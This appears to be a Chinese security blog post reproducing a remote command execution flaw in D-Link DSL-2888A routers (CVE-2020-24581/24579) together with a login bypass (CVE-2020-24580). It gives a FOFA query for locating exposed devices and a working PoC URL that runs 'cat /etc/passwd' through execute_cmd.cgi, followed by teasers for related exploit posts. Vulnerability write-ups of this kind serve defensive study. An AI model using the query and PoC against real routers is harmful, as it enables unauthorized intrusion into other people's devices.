D-Link DSL-2888A 远程命令执行漏洞(CVE-2020-24581/24579)

原创 已于 2023-06-23 11:06:40 修改 · 594 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全

于 2023-04-29 20:04:43 首次发布
D-LinkDSL-2888AAU在特定版本中存在安全漏洞,允许经过身份验证的用户通过未公开的executecmd.cgi特性执行操作系统命令。同时,设备还存在一个认证漏洞(CVE-2020-24580),用户可以输入任意密码访问路由器。攻击者可利用这些漏洞进行远程命令执行,例如通过http://IP/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=cat%20/etc/passwd进行poc测试。

漏洞描述

D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在安全漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。 在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。

漏洞影响

D-Link DSL-2888A

FOFA #

body="DSL-2888A"

漏洞复现

登录页面输入任意密码建立连接

 当输入错误密码时链接会跳到http://IP/page/login/login.html?error=fail

修改为poc即可远程执行命令


http://IP/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=cat%20/etc/passwd

最低0.47元/天 解锁文章
漏洞复现 D-Link DCS 密码泄露漏洞
失心少年
06-21 846
D-link DCS是一款网络摄像机,工作温度为0-50℃。D-link DCS系统存在密码泄露漏洞,攻击者通过漏洞可以获取后台权限。1.使用poc进行账号密码查看,得到密码登录即可。
D-Link DAR-8000操作系统命令注入漏洞(含批量验证poc)
weixin_43567873的博客
04-04 168
D-Link DAR-8000操作系统命令注入漏洞(含批量验证poc)
CVE-2024-34527 D-Link DSL-3782命令注入漏洞复现_dsl-3782_a1_eu_1
2401_84009749的博客
04-04 509
你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!” />你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!更多资料点击此处获qu!!
D-Link系列家用路由器漏洞分析总结
Hello World.c
04-27 2749
D-Link系列家用路由器漏洞分析总结 ⚡ 尚未了解清楚 ❗ 已编写好完整POC ❓ 未能编写完整POC ❌ 暂时不能实际验证 DCS-2530L CVE-2020-25078 ❗ 敏感信息泄露 D-Link DCS-1100 || DCS-1130 CVE-2017-8416 ⚡ DIR-850L cgi动态web服务器 CVE-2017-3193 ❗ 认证前栈溢出 CVE-2017-14421 ❗ 路由器后门 DIR-816 独立web服务器 CVE-2021-27114 ❓ 认证后栈溢出 CVE
D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542)
最新发布
swordheart的博客
05-18 315
D-Link DAR-8000-10版本存在操作系统命令注入漏洞,该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。
漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273)
m0_46381222的博客
11-19 1173
漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273)
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
**文章标题:**深入解析CVE-2020-24581:D-Link DSL-2888A远程命令执行漏洞 **文章正文:** D-Link DSL-2888A是一款由D-Link公司制造的统一服务路由器,它在AU_2.31_V1.1.47ae55之前的版本中存在一个严重的安全...
D-Link设备远程命令执行漏洞(CVE-2024-3273)
qq_69775412的博客
04-30 827
D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞
D-Link DSL-2888A双重漏洞威胁:远程命令执行与不安全认证剖析
D-Link DSL-2888A是一款由中国D-Link公司生产的统一服务路由器,该设备存在两个关键的安全漏洞,分别被标记为CVE-2020-24581CVE-2020-24580CVE-2020-24581涉及到一个远程命令执行漏洞,固件版本AU_2.31_V1.1.47...
物联网漏洞利用威胁观察
maoguan121的博客
10-16 470
从中可以看出攻 击者主要在对路由器和频监控设备进行漏洞利用,这也与互联网上暴露的物联网设备以路由器和频 监控设备为主相一致,说明攻击者偏向于对暴露数量较多的设备进行攻击,从而扩大其影响范围。从中可以看出攻 击者主要在对路由器和频监控设备进行漏洞利用,这也与互联网上暴露的物联网设备以路由器和频 监控设备为主相一致,说明攻击者偏向于对暴露数量较多的设备进行攻击,从而扩大其影响范围。2019 年,我们共捕获到 30 余种对于物联网漏洞的利用行为,其中以远程命令执行漏洞 居多。伊朗 俄罗斯 巴西 美国。
浅谈D-Link系列路由器漏洞挖掘入门
10-02
主要介绍了浅谈D-Link系列路由器漏洞挖掘入门,详细的介绍了D-Link系列的各种漏洞,具有一定的参考价值,有兴趣的可以了解一下
CVE-2020-25078:D-Link DCS系列账号密码信息扩展,通过脚本获取账号密码,可批量
03-30
CVE-2020-25078:D-Link DCS系列账号密码信息扩展,通过脚本获取账号密码,可批量
D-Link 路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告.pdf
02-28
近日,国家信息安全漏洞共享平台(CNVD)收录了D-Link DIR系列路由器身份验证信息泄露漏洞远程命令执行漏洞(CNVD-2017-20002、CNVD-2017-20001)。远程攻击者利用漏洞可获取路由器后台登录凭证并执行任意代码。相关利用代码已在互联网公开,受到影响的设备数量根据标定超过20万台,有可能会诱发大规模的网络攻击
D-Link RCE漏洞分析
weixin_43137410的博客
09-08 761
漏洞复现】友讯D-Link路由器弱口令漏洞
晚风不及你
01-27 1297
友讯电子设备(上海)有限公司于2002年8月13日成立。公司经营范围包括区内以路由器、网络卡、集线器、交换器、转换器等。
D-Link DIR505路由器溢出漏洞实战
牛叫兽的测试学习和分享
12-14 5331
IOT安全,溢出漏洞学习实践
D-link850路由器漏洞挖掘与利用
weixin_43046297的博客
12-28 2098
D-link850文件结构和各部分功能: 分析小型路由器,D-link850是个经典案例,解析完固件后,首先要搞清楚文件系统,可以从前端入手,追踪其数据流向,看前端对应的后端二进制处理文件。 因此我们系统地梳理一下D-link850存在的相关漏洞及发现过程: 敏感信息泄露: 首先我们不知道漏洞的位置,我们仅通过前端的相关信息进行数据流的追踪: 快捷配置界面:bsc_easysetup.php 但是解析后的系统文件夹内有3处有bsc_easysetup.php(web文件下,webinc的bo.
xray插件改良4-poc-yaml-dlink-dsl-2888a-rce
HWHXY的博客
03-23 530
xray插件改良4-poc-yaml-dlink-dsl-2888a-rce 前言 poc-yaml-dlink-dsl-2888a-rce原始的yml poc-yaml-dlink-dsl-2888a-rce name: poc-yaml-dlink-dsl-2888a-rce rules: - method: GET path: /page/login/login.html follow_redirects: false expression: | respons
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值